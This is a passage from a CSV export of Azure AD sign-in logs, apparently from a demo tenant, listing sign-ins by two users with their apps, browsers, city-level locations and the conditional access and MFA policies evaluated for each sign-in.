'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcd7b241800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,09a9b111-0bef-49d6-ac1b-dbcd7b241800,SigninLogs,Sucess,33.7984581,-84.38828278
+1159,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:43.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e0ce883a-330d-445a-9877-cb5efee9b81d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",71693871-d407-425c-bffa-acef29411200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,71693871-d407-425c-bffa-acef29411200,SigninLogs,Sucess,33.7984581,-84.38828278
+1160,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:50.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,00c465ff-ff8b-4df2-bc71-a8ff8cf079db,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f8439e11600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ec85dd07-c5e8-494c-aa5b-3f8439e11600,SigninLogs,Sucess,33.7984581,-84.38828278
+1161,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:51.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c3cc7ea-0da8-4807-96f5-2770e5e462c2,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cd98cc-4177-459a-870c-d2e459fd1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cd98cc-4177-459a-870c-d2e459fd1300,SigninLogs,Sucess,41.90428925,-85.99833679
+1162,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:35.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b6a9a448-0a05-4860-8235-0da9d3952080,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5710832e-d5f6-411b-b39c-044947091500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5710832e-d5f6-411b-b39c-044947091500,SigninLogs,Sucess,41.90428925,-85.99833679
+1163,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:01.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a2cd469f-d04f-0000-5421-7b98b2db0309,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f0d90a71-c139-4edc-9002-2dd7245f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f0d90a71-c139-4edc-9002-2dd7245f1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1164,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,43:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,a2cd469f-d04f-0000-5421-7b98b2db0309,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:43,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",4445394f-bc55-4988-8502-680d1f171600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,4445394f-bc55-4988-8502-680d1f171600,SigninLogs,Failed,41.90428925,-85.99833679
+1165,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:55.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7f352042-575f-45eb-978d-dd7bf896bc1e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea65aa1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,8d371308-4e1f-476f-97d6-c0ea65aa1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1166,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:56.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,26f1c85e-311a-4f70-bdd7-b2a3ab085317,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea76aa1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,8d371308-4e1f-476f-97d6-c0ea76aa1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1167,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:05.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6233614-30bc-46f5-a1bd-d5d9680296b9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 